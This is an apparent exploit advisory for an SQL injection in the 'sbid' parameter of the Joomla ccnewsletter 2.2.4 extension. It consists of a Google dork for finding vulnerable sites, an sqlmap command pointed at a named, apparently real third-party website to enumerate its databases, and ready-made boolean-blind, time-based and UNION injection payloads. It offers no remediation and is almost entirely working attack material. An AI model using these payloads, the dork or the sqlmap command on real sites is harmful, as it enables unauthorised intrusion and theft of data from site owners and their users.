"jommla component ccnewsletter 2.2.4 - 'sbid' Parameter SQL Injection"
# Exploit Title: jommla component ccnewsletter 2.2.4 - SQL Injection
# Date: 2019.09.23
# Exploit Author: Mahdi Karimi
# Vendor HomePage: https://extensions.joomla.org/extension/ccnewsletter/
# Version: 2.2.4 [Final Version]
# Tested on: win
# Google Dork: inurl:index.php?option=com_ccnewsletter inurl:sbid
sqlmap:
sqlmap -u "http://news.healthforanimals.org/index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148&Itemid=4&tmpl=newsletter" -p sbid --dbs
Testing Method;
- boolean-based blind
- time-based blind
- UNION query
Parameter: sbid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_ccnewsletter&view=detail&id=97&sbid=148 AND 3304=3304&Itemid=4&tmpl=newsletter
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: option=com_ccnewsletter&view=detail&id=97&sbid=148 AND SLEEP(5)&Itemid=4&tmpl=newsletter
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: option=com_ccnewsletter&view=detail&id=97&sbid=-3378 UNION ALL SELECT NULL,CONCAT(0x716a767871,0x416d6c435542734d6155546b64495978596547517a484468426e59664775654359556950614f4d72,0x71766b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uxIT&Itemid=4&tmpl=newsletter